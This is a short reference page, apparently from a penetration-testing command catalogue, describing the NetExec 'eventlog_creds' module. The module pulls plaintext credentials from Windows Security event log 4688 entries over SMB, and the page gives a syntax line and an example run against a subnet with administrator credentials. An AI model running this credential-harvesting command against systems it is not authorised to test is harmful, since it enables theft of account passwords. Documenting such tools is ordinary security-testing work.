NetExec eventlog_creds Module

Harvest plaintext credentials passed to processes (typically scheduled tasks, runas, custom scripts) from Security event log 4688 entries when process-creation auditing with command-line capture is enabled. Added in NetExec v1.5.0. Requires local admin to read the Security log.

Tool
nxc
Category
Credential Attacks / Hash Dumping
Platform
linux
Requires
password
Protocols
SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc smb <target> -u '<user>' -p '<password>' -M eventlog_creds

Examples

nxc smb 10.10.10.0/24 -u administrator -p 'Password123!' -M eventlog_creds

Tags

netexec nxc eventlog credentials audit-log

References